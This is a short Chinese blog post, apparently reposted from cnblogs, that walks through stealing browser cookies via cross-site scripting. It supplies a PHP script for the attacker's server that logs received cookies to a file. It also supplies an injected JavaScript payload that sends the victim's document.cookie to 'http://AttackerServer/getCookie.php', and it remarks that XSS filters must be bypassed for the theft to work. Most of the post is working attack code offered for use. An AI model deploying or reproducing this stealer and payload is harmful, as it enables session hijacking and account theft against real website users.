标签:getc 代码 地址 登陆 ati 做了 query info pre
此文需要有一定的javascript\html\php方面的只是作为基础
直接上代码:
#用于抓取盗窃来的cookie的php文件,此文件需置于攻击者的服务器上,这里包含了两种写法:Method1和Method2 #保存为getCookie.php <?php #Method 1 // $info=getenv("QUERY_STRING"); // if ($info) // { // # code... // $info=urldecode($info); // $fp=fopen("info.txt","a"); // fwrite($fp,$info."\n\n\n\n"); // fclose($fp); // } #Method2 $cookie = $_GET[‘cookie‘]; $log = fopen("cookie.txt", "a"); fwrite($log, $cookie ."\n"); fclose($log); ?>
接下来需要再被攻击者的服务器页面上注入一段javascript代码,用于将被攻击者的cookie传送到我们的服务器上
<script> document.location=‘http://AttackerServer/getCookie.php?cookie=‘+document.cookie; </script>
当被攻击者的浏览器加载了被恶意注入的代码后,就会向攻击者的服务器发送自己的cookie,从而达到了盗取用户cookie的目的
*注:当你浏览某个需要登陆的页面(比如论坛)时,在登录之后,把地址栏清空后在地址栏里写入javascript:alert(document.cookie)。你就会看到这个登陆页面在你计算机里保存的cookie。
解析:
可以看到,两种方法写的盗取cookie的攻击者脚本并不难,仅仅只做了一个接收参数,保存为文件的工作。
cookie盗取真正难的部分应该还是在于,如何向被攻击者的页面注入这段javascript脚本。这就要借助XSS跨站脚本攻击的一些手法,在对方管理员做了严格限制的情况下,需要想办法绕过XSS的过滤,才能使我们的cookie盗取奏效。
标签:getc 代码 地址 登陆 ati 做了 query info pre
原文地址:http://www.cnblogs.com/zlgxzswjy/p/6443336.html